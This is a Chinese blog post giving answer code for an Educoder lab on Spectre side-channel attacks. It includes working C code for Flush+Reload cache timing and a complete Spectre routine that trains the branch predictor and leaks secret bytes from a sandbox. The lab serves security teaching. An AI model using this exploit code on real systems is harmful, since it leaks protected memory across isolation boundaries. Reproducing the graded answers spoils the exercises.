头歌-信息安全技术-Spectre侧信道攻击过程验证

最新推荐文章于 2024-07-28 13:07:19 发布
最新推荐文章于 2024-07-28 13:07:19 发布
阅读量2.6k 收藏 12
点赞数 1
文章标签: 信息安全技术 python 头歌
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61963074/article/details/127618102
版权

头歌-信息安全技术-Spectre侧信道攻击过程验证

一、第1关:Cache vs Memory

1、编程要求

根据提示,在右侧编辑器完善代码,完成数据初始化、缓存驱逐、缓存加载、时延测定等全部环节,输出对array[10*4096]数组中各元素的访问时延。

2、评测代码

在这里插入图片描述

  for(i=0; i<10; i++) 
  	_mm_clflush(&array[i*4096]);

二、第2关:基于Flush+Reload的侧信道实现

1、编程要求

根据提示,在右侧编辑器补充代码,完成基于Flush+Reload的侧信道攻击实现,按要求打印攻击结果。

2、评测代码

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

//该实验中,假设用户没有Secret的访问权限,不能直接读取Secret的值,可以通过测时延来获取其内容。

#include <emmintrin.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>

FILE *fp;
uint8_t array[256*4096];
int temp;
unsigned char secret = 66;

/* 请去掉下面一行的注释,并将括号中的'THRESHOLD'替换为具体门限值,该门限值可以根据上一关中测得的缓存命中时延设定*/
#define CACHE_HIT_THRESHOLD (250)

#define DELTA 1024

void victim()
{
  temp = array[secret*4096 + DELTA];
}

void flushSideChannel()
{
  int i;
  // 初始化该数组,防止Copy-on-Write导致实验失败
  for (i = 0; i < 256; i++) 
    array[i*4096 + DELTA] = 1;
  // 驱逐缓存Cache,请在下方补充代码,将array[0*4096+DELTA]至array[255*4096+DELTA]等数据从缓存中强制驱逐
  /**************************************/
  for (i = 0; i < 256; i++) 
    _mm_clflush(&array[i*4096 + DELTA]);
  /**************************************/
}

void reloadSideChannel()
{
  int junk=0;
  register uint64_t time1, time2;
  volatile uint8_t *addr;
  int i;
  unsigned int ui;
  //请补全并下方代码,获得i*4096 + DELTA位置元素的访问时延,并将小于门限的访问行为判定为缓存命中,按照指定格式输出结果。
  /*******************/
  for(i = 0; i < 256; i++){  
   addr = &array[i*4096 + DELTA];
   time1 = __rdtscp(&ui);   
   junk = *addr;
   time2 = __rdtscp(&ui) - time1;
   if ((int)time2 <= CACHE_HIT_THRESHOLD){
	  printf("访问array[%d*4096 + %d]元素时发生缓存命中,时延%d.\n", i, DELTA, (int)time2);
      printf("秘密值Secret = %d(字符:\'%c\')。\n", i, i);
      fprintf(fp,"秘密值Secret = %d(字符:\'%c\')。\n" ,i, i); //不要修改本行代码
   }
  } 
  /******************/ 
  
}

int main(int argc, const char **argv)
{
  fp=fopen("Spectre-Attack/ans/T2/result.txt","w");

  flushSideChannel();
  victim();
  reloadSideChannel();
  fclose(fp);
  return (0);
}

三、第3关:Spectre预测执行

1、编程要求

根据提示,在右侧编辑器补充代码,完成对CPU分支预测的训练、边界外数据(即索引大于size的数组元素)向高速缓存的加载,并利用FLUSH+RELOAD侧信道来验证目标数据是否已加载。
考虑到利用Sepctre漏洞时,因为系统噪声(即其他系统进程对CPU的占用、对缓存的占用等)的影响,某些时候分支的预测不会按照我们的期望执行,因此,本任务中将重复10次实验,查看缓存命中结果。

2、评测代码

在这里插入图片描述
在这里插入图片描述

/* 请去掉下面一行的注释,并将括号中的'THRESHOLD'替换为具体门限值,该门限值可以根据第一关中测得的缓存命中时延设定*/
 #define CACHE_HIT_THRESHOLD (300)

    // 请补全下方代码并取消注释,①将victim()函数中分支判断需要的数据'size'从缓存中驱逐,以在后续调用中触发预测执行;②将array数组中i*4096+DELTA处的数据从缓存中驱逐,以便后续reload阶段判断目标数据是否被加载。
    /*******************************************/
    for (i = 0; i < 256; i++)
        _mm_clflush(&array[i* 4096 + DELTA]); 
    /********************************************/

四、第4关:Spectre攻击简单实验

1、编程要求

根据提示,在右侧编辑器补充代码,完成CPU分支预测的训练、边界外内存数据的缓存加载,并利用高速缓存侧信道提取目标地址的敏感信息值。

2、评测代码

在这里插入图片描述
在这里插入图片描述

/* 请去掉下面一行的注释,并将括号中的'THRESHOLD'替换为具体门限值,该门限值可以根据第一关中测得的缓存命中时延设定*/
#define CACHE_HIT_THRESHOLD (300)

  // 补全下方代码,将上界、下界以及array的数据从缓存中驱逐。
  /***********************************************************/
  _mm_clflush(&bound_upper);
  _mm_clflush(&bound_lower);
  for (i = 0; i < 256; i++){
        _mm_clflush(&array[i*4096 + DELTA]); 
  }
  /***********************************************************/

五、第5关:Spectre攻击实验改进

1、编程要求

根据提示,在右侧编辑器补充代码,完成准确的敏感字符提取(本关仅要求恢复处secret的第一个字符)。

2、评测代码

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

/* 请去掉下面一行的注释,并将括号中的'THRESHOLD'替换为具体门限值,该门限值可以根据第一关中测得的缓存命中时延设定*/
#define CACHE_HIT_THRESHOLD (80)

  //补全下方代码,当每次字符i被命中一次,对应的积分+1
  /*************************************/
  for (i = 0; i < 256; i++) {
    addr = &array[i * 4096 + DELTA];
    time1 = __rdtscp(&junk);
    junk = *addr;
    time2 = __rdtscp(&junk) - time1;
    if (time2 <= CACHE_HIT_THRESHOLD)
      scores[i]++; 
  } 
  /*************************************/

  // 补全下方代码,从scores数组中找到最大值,并将其索引值赋值给max
  /*************************************/
  for (i = 0; i < 256; i++){
    if(scores[max] < scores[i]) max = i;
  }
  /*************************************/

六、第6关:Spectre攻击窃取敏感信息实战

1、编程要求

根据提示,在右侧编辑器补充代码,完善各函数代码,最终输出指定格式的敏感信息窃取结果。

2、评测代码

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

#include <emmintrin.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include "encipher.h"

extern unsigned int bound_lower;
extern unsigned int bound_upper;

uint8_t temp    = 0;
  
uint8_t array[256*4096];

/* 请去掉下面一行的注释,并将括号中的'THRESHOLD'替换为具体门限值,该门限值可以根据第一关中测得的缓存命中时延设定*/
#define CACHE_HIT_THRESHOLD (80)

#define DELTA 2048
static int scores[256];
FILE *fp;

void flushSideChannel()
{
  //补全下方代码,初始化array数组,并将所有相关数据从缓存中驱逐
  /*************************************/
  int i;
  for(i=0;i<256;i++){
    array[i*4096+DELTA]=1;
  }
  for(i=0;i<256;i++){
    _mm_clflush(&array[i*4096+DELTA]);
  }
  /*************************************/
}

void reloadSideChannelImproved()
{
  //补全下方代码,完成高速缓存侧信道的Reload步骤,根据缓存命中情况,更新score数组
  /*************************************/
  int i;
  volatile uint8_t *addr;
  register uint64_t time1, time2;
  int junk = 0;
  for (i = 0; i < 256; i++) {
    addr = &array[i * 4096 + DELTA];
    time1 = __rdtscp(&junk);
    junk = *addr;
    time2 = __rdtscp(&junk) - time1;
    if (time2 <= CACHE_HIT_THRESHOLD){
      scores[i]++; 
    }
  } 
  /*************************************/
}

void spectreAttack(size_t index_beyond)
{
  //补全下方代码,针对指定的内存位置,开展Spectre攻击,包括缓存清空、CPU训练、缓存驱逐、预测执行和缓存加载等环节
  /*************************************/
  int i;
  uint8_t s;
  volatile int z;
  for (i = 0; i < 256; i++)  { 
    _mm_clflush(&array[i*4096 + DELTA]); 
  }
  // 训练CPU,使其在攻击时进入期望的预测分支.
  for (i = 0; i < 10; i++) {
    get_info_sand_box(i);
  }
  // 将上界、下界以及array的数据从缓存中驱逐。
  _mm_clflush(&bound_upper);
  _mm_clflush(&bound_lower); 
  for (i = 0; i < 256; i++){ 
    _mm_clflush(&array[i*4096 + DELTA]); 
    }
  for (z = 0; z < 100; z++)  {  }
  // 调用沙箱访问函数,利用预测执行漏洞访问合法内存边界之外的秘密值
  s = get_info_sand_box(index_beyond);
  if(s!=0)
    array[s*4096 + DELTA] += 88;
  /*************************************/
}

int main() {
  //补全下方代码,针对敏感信息secret的每个字节,逐个进行提取,每个字节的提取操作执行1000次,并按照指定格式输出提取结果及其积分值(可以包括最优值与次优值,即score最大的值和第二大的值的索引)。
  //打印示例:printf("第%d个秘密字符的最优值 \'%c\' (ASCII: %d) 积分:[%d] ", k, (max > 31 && max < 127 ? max : '?'), max, scores[max]);
  /*************************************/
  int i;
  uint8_t s;
  fp=fopen("/home/result.txt","w");
  size_t index_beyond = get_addr_offset();
  flushSideChannel();
  int len = get_secret_len();
  int k = 0;
  while(--len>=0){
    for(i=0;i<256; i++){
      scores[i]=0; 
    }
    for (i = 0; i < 1000; i++) {
            spectreAttack(index_beyond+k);
            usleep(10);
            reloadSideChannelImproved();
    }
    int max = 0; 
    int runner_up = 0; 
    for (i = 0; i < 256; i++){
    // printf("%d ", scores[i]);
      if(scores[max] < scores[i]) {
          max = i;
      }
    }
    for (i = 0; i < 256; i++){
      if(scores[runner_up] < scores[i] && i!=max) {
        runner_up = i;
      }
    }
    printf("第%d个秘密字符的最优值 '%c' (ASCII: %d) 积分:[%d] ", k, (max > 31 && max < 127 ? max : '?'), max, scores[max]);
    printf("次优值 '%c' (ASCII: %d) 积分:[%d]\n", (runner_up > 31 && runner_up < 127 ? runner_up : '?'), runner_up, scores[runner_up] );
    fprintf(fp,"%c",(max > 31 && max < 127 ? max : '?'));
    k++;
  }
  /*************************************/
  return (0); 
}
不服输的小乌龟
关注
头歌实践教学平台 数据采集与处理技术 实训答案(二)
qq_63961628的博客
09-25 2559
头歌实践教学平台 数据采集与处理技术 实训答案
【ARM 芯片 安全与攻击 5.3 -- Spectre 攻击与防御介绍】
最新发布
CodingCos的博客
08-17 328
Spectre 攻击是一种基于推测执行(speculative execution)机制的信道攻击。现代处理器为了提高性能,会在分支预测时提前执行一些指令,这些指令可能在将来被证明是不必要的。Spectre 攻击利用这一推测执行的特性,诱导处理器执行不应执行的代码路径,并通过信道泄漏敏感数据。
Spectre信道攻击过程验证头歌教学实践平台】
m0_64587776的博客
10-31 813
头歌教学实践平台——Spectre信道攻击过程验证 Spectre漏洞是2017年被发现并于2018年1月份被公开披露的一个处理器A级漏洞,涉及CVE编号CVE-2017-5754。该漏洞出现的根源在于当前CPU为了提高运行效率而使用的一种优化机制——预测执行,该机制的目的在于提前准备好计算结果和内存数据等,确保CPU需要该数据被能够被立即获取。利用该漏洞,攻击者可以突破进程间的隔离和用户间的隔离,窃取其他进程或用户的数据,漏洞影响涉及Intel、AMD、ARM等主流的处理器,覆盖从个人电脑到云服务器等
利用Spectre(幽灵)实现Meltdown攻击
Nozidoali的博客
10-21 665
Meltdown攻击通过利用Intel微处理器结构的设计缺陷,通过乱序执行时的计算痕迹建立信道,从而实现越界访问,进而攻击内核空间的地址。然而朴素的Meltdown攻击由于会频繁触发缺页错误,导致攻击程序提前退出,无法持续的对靶地址进行持续的访问。在这篇笔记中,主要介绍第三种处理异常退出攻击的方式:Spectre(幽灵)攻击。具体的说,通过处理器分支预测算法的设计缺陷,在错误的分支预测被系统发现之前的间隙,完成meltdown攻击
头歌-信息安全技术-安全审计
不服输的小乌龟
10-25 2058
根据提示,完成上列步骤,并且将审计工程中关于 SSH 支持显示正常的前五个选择填写到目录 /data/workspace/myshixun 下的 1.txt 中,中间用 , 隔开。
从入门到入土:[SEED-Lab]-幽灵攻击|Spectre Attack Lab|详细说明|实验步骤|实验截图
Q_U_A_R_T_E_R的博客
11-24 3060
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益。不合适引用,自当删除! 若被用于非法行为,与我本人无关 [SEED-Lab]-Spectre Attack Lab实验环境PDF文件实验步骤环境配置Labsetup操作步骤Tasks 1 and 2: Side Channel Attacks via CPU CachesTask 1: Reading from Cache versu
头歌-信息安全技术-实训04 数据库SQL注入漏洞
不服输的小乌龟
10-17 6916
搭建dvwa环境,包括1、搭建LAMP服务;2、部署dvwa服务;3、访问dvwa主页。
ARM PAC指针认证的信道攻击——PACMAN安全漏洞
security²-卢鸿波-安全二次方
02-04 1234
PACMAN论文的主题是什么? Arm的CPU是否受到影响? 由Arm的合作伙伴根据架构许可设计的处理器实现是否会受到影响? Cortex-M85是否受到影响? Cortex-R82是否受到影响? 指针认证如何保护软件? PACMAN的详细工作原理是什么? PACMAN有哪些局限性? 用户是否应对PACMAN感到担忧? 是否有可用于缓解PACMAN的方法?
CHES 2023 issue-1文章总结
dedanddwb的博客
07-25 833
来源:https://ches.iacr.org/2023/acceptedpapers.php。
信息安全工程师第二版考试总结+笔记
热门推荐
IT技术
11-29 2万+
信息安全工程师第二版考试总结+笔记
对Arm处理器和安全缓存的缓存攻击评估
baron-周贺贺-代码改变世界ctw
07-28 120
处理器缓存中的基于时间的信道和隐蔽信道仍然对现代计算机构成威胁。本研究首次展示了对Arm设备进行系统的大规模分析以及处理器易受攻击的详细结果。与x86相比,Arm使用不同的架构、微架构实现、缓存替换策略等,这些都影响了攻击的发起方式以及漏洞安全测试的方式。为了评估安全性,本文提出了专门用于测试Arm处理器及其缓存的安全基准。通过敏感性测试对这些基准进行了评估,检查基准在测试阶段配置正确时的敏感性。
Intel CPU spectre漏洞利用方法
07-31
奥地利 Graz 理工大学的研究人员演示了通过网络远程利用 Spectre V1 漏洞的方法。他们将这一利用方法命名为 NetSpectre。通过 NetSpectre,攻击者无需在目标系统执行任何代码就能远程读取系统内存。
Spectre Attacks: Exploiting Speculative Execution 翻译
weixin_43156135的博客
05-03 1306
spectreabstractI. INTRODUCTIONA.Our ResultsB Our TechniquesC. Targeted Hardware and Current StatusD. MeltdownII. BACKGROUNDA.Out-of-order ExecutionB. Speculative ExecutionC. Branch PredictionD. The Me...
javascript,chrome与幽灵攻击---JavaScript,chrome with Spectre Attacks
szengtal的专栏
09-22 1191
&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;nbsp;&amp;amp;amp;amp;amp;amp;amp;a
标题:揭秘Spectre攻击:深入理解与实战演练
gitblog_00009的博客
05-18 365
标题:揭秘Spectre攻击:深入理解与实战演练 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 Spectre Attack Example 是一个开源项目,用于示例2018年1月首次公布的“Spectre”漏洞(CVE-2017-5753 和 CVE-2017-5715)的利用方法。这个项目不仅揭示了这种潜在的安全威胁,还提供了代码实现,帮助开发者理解和防范此类攻...
最新Spectre攻击手法 黑客可从远端发动攻击
chengyou2471的博客
07-30 388
今年初发生在英特尔、AMD等芯片的Spectre漏洞令人余悸犹存,现在有研究人员发现新的Spectre漏洞攻击手法,让黑客可从远程发动攻击,不需植入任何程序代码。 Spectre变种1(CVE-2017-5753)是发生于CPU中推测执行(speculative execution)的功能漏洞...
Meltdown & Spectre 攻击及缓解措施(一)
Baidu_Secrity的博客
01-09 1275
Yueqiang Cheng, Yulong Zhang, Yu Ding, Tao WeiBaidu X-Lab, Jan 8, 20181. 引言最近Google Project ...
头歌实验-信息安全-入侵防范
哩吇的博客
11-18 2535
学习信息安全
CPU漏洞之Spectre
W1Z1Q的专栏
03-03 1247
Spectre攻击通过欺骗处理器,使其推测性地执行在正确的程序执行下不应该执行的具有可测量副作用的操作,并通过通道(Side channel)将受害者的机密信息泄露出去。
Cadence仿真教程:Ultrasim、Spectre与Spectre-Verilog解析
Spectre-Verilog则结合了Spectre的电路仿真能力和Verilog的硬件描述语言,支持混合信号设计的仿真,允许设计师在同一个环境中同时处理数字和模拟部分,极大地简化了数模混合设计的验证过程。 Cadence的EDA软件套件...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不服输的小乌龟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值